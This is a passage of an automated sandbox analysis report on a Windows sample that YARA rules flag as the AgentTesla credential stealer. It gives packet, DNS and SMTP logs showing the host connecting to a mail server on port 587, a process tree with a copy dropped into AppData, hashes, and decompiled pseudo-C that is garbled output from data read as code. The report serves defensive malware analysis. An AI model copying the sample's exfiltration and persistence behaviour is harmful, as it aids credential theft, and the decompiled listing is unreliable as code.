Nov 21, 2020 11:50:55.197941065 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:55.338047028 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:55.340867996 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:55.481883049 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:55.483176947 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:55.625559092 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:55.627223015 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:55.768594027 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:55.769537926 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:55.940599918 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:55.941596985 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:56.081958055 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:56.084464073 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:56.084712982 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:56.086075068 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:56.086263895 CET	49705	587	192.168.2.3	208.91.199.223
Nov 21, 2020 11:50:56.224912882 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:56.226118088 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:56.281492949 CET	587	49705	208.91.199.223	192.168.2.3
Nov 21, 2020 11:50:56.324687958 CET	49705	587	192.168.2.3	208.91.199.223

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 21, 2020 11:49:00.342525005 CET	58643	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:00.369796038 CET	53	58643	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:01.159915924 CET	60985	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:01.195913076 CET	53	60985	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:01.985521078 CET	50200	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:02.031909943 CET	53	50200	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:03.110939026 CET	51281	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:03.138370037 CET	53	51281	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:03.988863945 CET	49199	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:04.024777889 CET	53	49199	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:05.080199957 CET	50620	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:05.107399940 CET	53	50620	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:06.511970043 CET	64938	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:06.539222956 CET	53	64938	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:07.384519100 CET	60152	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:07.420312881 CET	53	60152	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:08.051018000 CET	57544	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:08.086694002 CET	53	57544	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:08.867675066 CET	55984	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:08.894915104 CET	53	55984	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:09.683259010 CET	64185	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:09.710575104 CET	53	64185	8.8.8.8	192.168.2.3
Nov 21, 2020 11:49:34.136075020 CET	65110	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:49:34.175523996 CET	53	65110	8.8.8.8	192.168.2.3
Nov 21, 2020 11:50:53.140547037 CET	58361	53	192.168.2.3	8.8.8.8
Nov 21, 2020 11:50:53.176415920 CET	53	58361	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 21, 2020 11:50:53.140547037 CET	192.168.2.3	8.8.8.8	0xe2aa	Standard query (0)	us2.smtp.mailhostbox.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 21, 2020 11:50:53.176415920 CET	8.8.8.8	192.168.2.3	0xe2aa	No error (0)	us2.smtp.mailhostbox.com	208.91.199.223	A (IP address)	IN (0x0001)
Nov 21, 2020 11:50:53.176415920 CET	8.8.8.8	192.168.2.3	0xe2aa	No error (0)	us2.smtp.mailhostbox.com	208.91.198.143	A (IP address)	IN (0x0001)
Nov 21, 2020 11:50:53.176415920 CET	8.8.8.8	192.168.2.3	0xe2aa	No error (0)	us2.smtp.mailhostbox.com	208.91.199.224	A (IP address)	IN (0x0001)
Nov 21, 2020 11:50:53.176415920 CET	8.8.8.8	192.168.2.3	0xe2aa	No error (0)	us2.smtp.mailhostbox.com	208.91.199.225	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 21, 2020 11:50:54.152650118 CET	587	49705	208.91.199.223	192.168.2.3	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 21, 2020 11:50:54.153371096 CET	49705	587	192.168.2.3	208.91.199.223	EHLO 585948
Nov 21, 2020 11:50:54.293366909 CET	587	49705	208.91.199.223	192.168.2.3	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN
Nov 21, 2020 11:50:54.293935061 CET	49705	587	192.168.2.3	208.91.199.223	STARTTLS
Nov 21, 2020 11:50:54.433954000 CET	587	49705	208.91.199.223	192.168.2.3	220 2.0.0 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: jF6LSw9bnC.exe PID: 5864 Parent PID: 5592

General

Start time:	11:49:05
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\jF6LSw9bnC.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\jF6LSw9bnC.exe'
Imagebase:	0xfe0000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000003.212487577.0000000005CE5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.224466566.0000000005CE5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.224130542.00000000059A2000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.223257236.0000000005044000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: jF6LSw9bnC.exe PID: 6056 Parent PID: 5864

General

Start time:	11:49:11
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\jF6LSw9bnC.exe
Wow64 process (32bit):	false
Commandline:	jF6LSw9bnC.exe
Imagebase:	0x260000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: jF6LSw9bnC.exe PID: 6024 Parent PID: 5864

General

Start time:	11:49:12
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\jF6LSw9bnC.exe
Wow64 process (32bit):	false
Commandline:	jF6LSw9bnC.exe
Imagebase:	0x210000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: jF6LSw9bnC.exe PID: 5888 Parent PID: 5864

General

Start time:	11:49:12
Start date:	21/11/2020
Path:	C:\Users\user\Desktop\jF6LSw9bnC.exe
Wow64 process (32bit):	true
Commandline:	jF6LSw9bnC.exe
Imagebase:	0xf50000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.475373692.0000000003391000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.469106569.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: YYtJku.exe PID: 5004 Parent PID: 3388

General

Start time:	11:49:46
Start date:	21/11/2020
Path:	C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe'
Imagebase:	0xaf0000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.304664651.000000000117A000.00000004.00000020.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.307682957.0000000004B54000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.308785428.00000000056C2000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, Virustotal, Browse Detection: 48%, ReversingLabs
Reputation:	low

Chronological Activities

Analysis Process: YYtJku.exe PID: 6124 Parent PID: 5004

General

Start time:	11:49:52
Start date:	21/11/2020
Path:	C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
Wow64 process (32bit):	true
Commandline:	YYtJku.exe
Imagebase:	0xb30000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.474483881.0000000002F91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.469108481.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: YYtJku.exe PID: 5940 Parent PID: 3388

General

Start time:	11:49:55
Start date:	21/11/2020
Path:	C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe'
Imagebase:	0xbc0000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.334212460.00000000058F5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.334155127.0000000005812000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.332958672.0000000004B64000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: YYtJku.exe PID: 4092 Parent PID: 5940

General

Start time:	11:50:02
Start date:	21/11/2020
Path:	C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
Wow64 process (32bit):	false
Commandline:	YYtJku.exe
Imagebase:	0x230000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: YYtJku.exe PID: 4260 Parent PID: 5940

General

Start time:	11:50:02
Start date:	21/11/2020
Path:	C:\Users\user\AppData\Roaming\YYtJku\YYtJku.exe
Wow64 process (32bit):	true
Commandline:	YYtJku.exe
Imagebase:	0xd90000
File size:	618496 bytes
MD5 hash:	020BC13012CE4DB6E204CB1ED174851E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.469149092.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.474773451.0000000003471000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: jF6LSw9bnC.exe PID: 5864 Parent PID: 5592 jF6LSw9bnC.exeCOMMON

Executed Functions

Function 019D3750, Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40b4b58ae81a19e7beeea045d36103a7d9e416d259454043e016ef072c8b9a3f
Instruction ID: 8a00dbcb3f96f12ea292151412dbb11258cc09af1655eb688b98b7cd979f76da
Opcode Fuzzy Hash: 40b4b58ae81a19e7beeea045d36103a7d9e416d259454043e016ef072c8b9a3f
Instruction Fuzzy Hash: 1371F371B002068BCB14EBB9D8545BEB7A7FFC8345F158129D50AEB391EF709D058792

Uniqueness

Uniqueness Score: -1.00%

Function 019D35B4, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c25c84373be6bce4141dd238fce6229642136f504f43ed3cba2adaf9c3802e7
Instruction ID: f2ac38c81e6fd54200c6168c89b84738a15bf25d81b77228d8d78ca8c5ebec86
Opcode Fuzzy Hash: 7c25c84373be6bce4141dd238fce6229642136f504f43ed3cba2adaf9c3802e7
Instruction Fuzzy Hash: 9141E2B1D012189BDB20DFAAC584ADEFBB5FF48315F248429D509BB200D7756A49CF91

Uniqueness

Uniqueness Score: -1.00%

Function 019D3B68, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eae6917c5f9619f829d603dacec4a9ddd8916da0536576f749e31d810f7026ae
Instruction ID: 0dfc1aa7a82f84d82d1dc8b927e6357abb62eeafb7bc9b24d265479cf10753a3
Opcode Fuzzy Hash: eae6917c5f9619f829d603dacec4a9ddd8916da0536576f749e31d810f7026ae
Instruction Fuzzy Hash: C821E171A002058FCB10EB79C85449BBBEAFF85209B05C4ADD50ADB351EB71E909CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 019D356C, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe6d8b65362297dcbb2e253f72416822abdcea9740cb0649bda3c8dc3e6866d
Instruction ID: 04ef72f2c32847b297110cbfb627d566171e3bae3ec172bdfc7367af07dc62b8
Opcode Fuzzy Hash: ffe6d8b65362297dcbb2e253f72416822abdcea9740cb0649bda3c8dc3e6866d
Instruction Fuzzy Hash: 7D31E0B0E01218EFDB20DF99C984B9EBFF4BB48315F24845AE408BB240C7B55945CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 019D3578, Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca1be954a767475b3d1e31557521983518356844b0d83fdfb967fd3a07c893d7
Instruction ID: ad05b274250613bafa5f41195676ae12df42ecebdf14d954f65e21ccae492fae
Opcode Fuzzy Hash: ca1be954a767475b3d1e31557521983518356844b0d83fdfb967fd3a07c893d7
Instruction Fuzzy Hash: 421103B59007489FCB20DF9AD448BDEFBF8EB48324F14845AEA59A7700D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 019D3DF8, Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72c5cc86660e1a0bdb6274680c76ad74451c3232806c3b875245f22691f3a8a7
Instruction ID: cbf50d2ca9275562f4a1754d3611a0284ce7d4028eb2f541188ebef255dd43c5
Opcode Fuzzy Hash: 72c5cc86660e1a0bdb6274680c76ad74451c3232806c3b875245f22691f3a8a7
Instruction Fuzzy Hash: A70104B0900208DFDB14CF5AC4487DEBEF5FB48355F24C169D5185B290C7745A44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 019D0A70, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a680e968b4f5bc87a8143f622d8cf80f99ddc6158f12e1a95de97bd5802b7e
Instruction ID: fbdf55332476a9bc69bd6466836c85e98d0feb67a4ced88933c15181ad85603f
Opcode Fuzzy Hash: 59a680e968b4f5bc87a8143f622d8cf80f99ddc6158f12e1a95de97bd5802b7e
Instruction Fuzzy Hash: 1E012830A40219DFEB14DF94D91DBEE7BB5FB48304F184569E106BB290CBB95904CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 019D0468, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d65362fc46a6cd9f2939a41f119f8f589dba0b2525ee4e055ae94cb0fa42a067
Instruction ID: a290376f1887bc083ab9b14c7e384c373824010257f23a72c4adba6c3c153896
Opcode Fuzzy Hash: d65362fc46a6cd9f2939a41f119f8f589dba0b2525ee4e055ae94cb0fa42a067
Instruction Fuzzy Hash: 33E0ED311191558FC794FBB5F84885C776AAB882087029965E505C7234DF35AD148FA2

Uniqueness

Uniqueness Score: -1.00%

Function 019D3B10, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e78051c70d8d4ddade9e0c121afab98d41fc76207894b87e2709eb853dd8570d
Instruction ID: e0402d8cc44ac068bda6f965ec39b2be813c9b9aac7bce5d3077a058bfcff453
Opcode Fuzzy Hash: e78051c70d8d4ddade9e0c121afab98d41fc76207894b87e2709eb853dd8570d
Instruction Fuzzy Hash: 94E0BF34902209EF8B40EFA4E94196DB7F9FB49314F115599D80497310DA356F11DB66

Uniqueness

Uniqueness Score: -1.00%

Function 019D0A38, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.219157990.00000000019D0000.00000040.00000001.sdmp, Offset: 019D0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f941bba907da0c4f9d0434e5c226cfebd1ba949f3e3903cc9c1eb1e44f6f9c1b
Instruction ID: 8d30e7445088944dd8abf36c168bacfc007b697adc81acd1d7593783324777e7
Opcode Fuzzy Hash: f941bba907da0c4f9d0434e5c226cfebd1ba949f3e3903cc9c1eb1e44f6f9c1b
Instruction Fuzzy Hash: CBC04C347143088BCF553BB47D2D56C779ABB8550A7442826E50BC375CEE789824C7D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0106F3A9, Relevance: .6, Instructions: 623
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E0106F3A9(signed int __eax, void* __ebx, signed int __ecx, intOrPtr* __edx, signed int __edi, signed int __esi) {
				signed char _t318;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t325;
				signed int _t331;
				signed int _t334;
				intOrPtr* _t335;
				signed int _t338;
				signed int _t340;
				signed int _t345;
				signed int _t347;
				intOrPtr* _t348;
				signed int _t350;
				intOrPtr* _t352;
				signed int _t353;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				intOrPtr* _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed char _t374;
				signed char _t375;
				signed char _t378;
				signed char _t379;
				signed char _t380;
				signed char _t381;
				signed char _t382;
				signed char _t383;
				signed char _t384;
				signed char _t385;
				signed int _t386;
				signed int* _t389;
				signed int _t390;
				signed int* _t391;
				intOrPtr* _t394;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t398;
				signed int* _t399;
				signed int _t401;
				signed int* _t402;
				signed int _t403;
				signed int _t404;
				signed int* _t406;
				signed char _t410;
				intOrPtr* _t411;
				signed int _t412;
				char* _t413;
				signed char _t414;
				void* _t417;
				signed int _t419;
				signed int _t420;
				signed char _t422;
				intOrPtr* _t423;
				void* _t424;
				signed int _t425;
				signed int _t431;
				intOrPtr _t432;
				intOrPtr* _t433;
				void* _t435;
				signed int* _t436;
				signed int* _t437;
				signed int* _t438;
				intOrPtr* _t440;
				signed int* _t442;
				signed int _t444;
				intOrPtr* _t445;
				signed int _t446;
				signed int _t449;
				signed int _t451;
				signed int* _t453;
				signed int* _t459;
				signed int* _t463;
				signed int* _t465;
				signed int* _t466;
				signed int _t468;
				signed int _t469;

				_t318 = __eax | 0xffffffff9fe00603;
				asm("sbb ecx, [0xb8000102]");
				_pop(ds);
				asm("in al, dx");
				asm("adc eax, [esi]");
				 *((intOrPtr*)(__esi + 0x113ec1b)) =  *((intOrPtr*)(__esi + 0x113ec1b)) + __ecx;
				 *__edx =  *__edx + _t318;
				asm("adc eax, [esi]");
				_t320 = (_t318 & __ecx) + (_t318 & __ecx);
				asm("sbb ebp, esp");
				asm("adc eax, [ecx]");
				_t466[0x43aac7] = _t466[0x43aac7] + _t320;
				_t466[0x407647] = _t466[0x407647] + __ecx;
				_t419 = __ecx + __ecx;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t320;
				_t321 = _t320 + _t419;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t321;
				_t410 = __ebx + __edx;
				_pop(ds);
				asm("scasd");
				 *_t419 =  *_t419 + _t321;
				 *((intOrPtr*)(__esi + 0x16)) =  *((intOrPtr*)(__esi + 0x16)) + _t321;
				_t322 = _t321 | 0x17000102;
				_pop(ss);
				asm("scasd");
				 *_t419 =  *_t419 + _t322;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t419;
				asm("popfd");
				_t323 = _t322 - 0xaf;
				 *__esi =  *__esi + _t323;
				 *_t323 =  *_t323 + _t323;
				asm("das");
				asm("scasd");
				 *_t419 =  *_t419 + _t323;
				 *((intOrPtr*)(_t419 + 0x6020d2c)) =  *((intOrPtr*)(_t419 + 0x6020d2c)) + _t323;
				 *_t419 =  *_t419 + _t419;
				asm("das");
				_pop(ds);
				_t325 = _t323 | 0xfffffffffb000702;
				asm("das");
				_push(_t325);
				asm("sbb dh, [esi]");
				 *((intOrPtr*)(_t325 + 0xf)) =  *((intOrPtr*)(_t325 + 0xf)) + _t325;
				asm("pushad");
				asm("sbb dl, [esi]");
				 *__edx =  *__edx + _t410;
				_t466[6] = _t466[6] ^ _t325;
				_push(ss);
				 *((intOrPtr*)(_t325 + __esi)) =  *((intOrPtr*)(_t325 + __esi)) + _t325;
				asm("outsb");
				asm("sbb al, [esi]");
				 *_t419 =  *_t419 + _t410;
				asm("sbb al, 0x1f");
				_push(ss);
				_push(es);
				 *((intOrPtr*)(_t325 + 0x1c)) =  *((intOrPtr*)(_t325 + 0x1c)) + __edx;
				_t466[6] = _t466[6] & _t410;
				 *[ss:eax+0xf] =  *[ss:eax+0xf] + (_t325 | 0x3c000602);
				_push(ss);
				 *__edi =  *__edi + __edx;
				 *0x66000134 =  *0x66000134 & 0x0000001a;
				ss = ss;
				asm("scasd");
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(__esi + __edx + 0x1020d)) =  *((intOrPtr*)(__esi + __edx + 0x1020d)) + _t419;
				_push(es);
				 *((intOrPtr*)(__edi + 0x1020d30)) =  *((intOrPtr*)(__edi + 0x1020d30)) + _t419;
				 *0x16FFFF3A =  *((intOrPtr*)(0x16ffff3a)) + __edx;
				 *0xc9000102 =  *0xc9000102 ^ _t419;
				 *(__edi - 0x23ffff00) =  *(__edi - 0x23ffff00) ^ _t419;
				_t331 = 0xffffffffbeffff0f ^ _t410;
				asm("sbb al, [ecx]");
				 *_t419 =  *_t419 ^ 0x0000001a;
				asm("sbb eax, [ecx]");
				 *0x2000102 =  *0x2000102 ^ _t419;
				 *0x66000102 =  *0x66000102 ^ _t419;
				ss = ss;
				_push(ss);
				_t431 = __edx + _t331 + __edx + _t331 &  *(__edi + 0x1800060d);
				 *(__edi + 0x2100010d) =  *(__edi + 0x2100010d) ^ _t431;
				 *(__edi + 0x2c000109) =  *(__edi + 0x2c000109) ^ __esi;
				_t334 = (_t331 | 0x37000102) ^ __edi;
				 *_t419 =  *_t419 + _t334;
				_t335 = _t334 + _t410;
				asm("clc");
				 *_t419 =  *_t419 + _t335;
				 *0x1020d31 =  *0x1020d31 + _t410;
				 *((intOrPtr*)(_t419 + __esi - 5)) =  *((intOrPtr*)(_t419 + __esi - 5)) + 0x1a;
				asm("adc [ecx], al");
				 *((intOrPtr*)(_t410 + 0x31)) =  *((intOrPtr*)(_t410 + 0x31)) + _t431;
				asm("scasd");
				 *_t419 =  *_t419 + 0x1a;
				_t466[0xc] = _t466[0xc] + _t410;
				_t440 = _t335;
				asm("scasd");
				 *__esi =  *__esi + _t431;
				_t338 = (__edi | 0x33780006) + _t419;
				ss = ss;
				asm("sgdt [es:eax]");
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(_t338 + 0x34)) =  *((intOrPtr*)(_t338 + 0x34)) + _t431;
				_t340 = (_t338 | 0x6b000102) ^ 0x000000af;
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(__esi + 0x10d9734)) =  *((intOrPtr*)(__esi + 0x10d9734)) + 0x1a;
				 *((intOrPtr*)(__esi + 0x10db0)) =  *((intOrPtr*)(__esi + 0x10db0)) + _t340;
				_t59 = _t440 + _t431 * 4;
				_t432 =  *_t59;
				 *_t59 = _t431;
				asm("scasd");
				 *__esi =  *__esi + 0x1a;
				_push(es);
				asm("invalid");
				_t469 = _t340 | 0x353a0001;
				asm("pushfd");
				asm("movsb");
				_t345 = _t468 ^ 0x11c9f;
				 *_t419 =  *_t419 + 0x1a;
				 *((intOrPtr*)(_t440 + 0x3300af35)) =  *((intOrPtr*)(_t440 + 0x3300af35)) + _t432;
				 *((intOrPtr*)(_t419 + 0x36)) =  *((intOrPtr*)(_t419 + 0x36)) + __esi;
				asm("out 0x1c, eax");
				asm("enter 0x20, 0x0");
				 *_t345 =  *_t345 + 0x1a;
				_t444 = _t345;
				 *((intOrPtr*)(_t432 + 0x21)) =  *((intOrPtr*)(_t432 + 0x21)) + _t410;
				_push(_t419);
				 *_t419 =  *_t419 + 0x1a;
				_t433 = _t432 + _t432;
				 *__esi =  *__esi & 0x0000001a;
				 *__esi =  *__esi + 0x1a;
				 *((intOrPtr*)(_t444 + 0x60219a00)) =  *((intOrPtr*)(_t444 + 0x60219a00)) + _t433;
				 *_t410 =  *_t410 + 0x1a;
				_t411 = _t410 + __esi;
				 *__esi =  *__esi & 0x0000001a;
				 *__esi =  *__esi + 0x1a;
				 *((intOrPtr*)(_t444 + 0x6821ae00)) =  *((intOrPtr*)(_t444 + 0x6821ae00)) + _t433;
				 *0x20f400 =  *0x20f400 + 0x1a;
				 *__esi =  *__esi + 0x1a;
				 *((intOrPtr*)(_t444 + 0x6e21c300)) =  *((intOrPtr*)(_t444 + 0x6e21c300)) + _t433;
				 *_t444 =  *_t444 + 0x1a;
				_t347 = __esi + _t411;
				 *_t347 =  *_t347 & 0x0000001a;
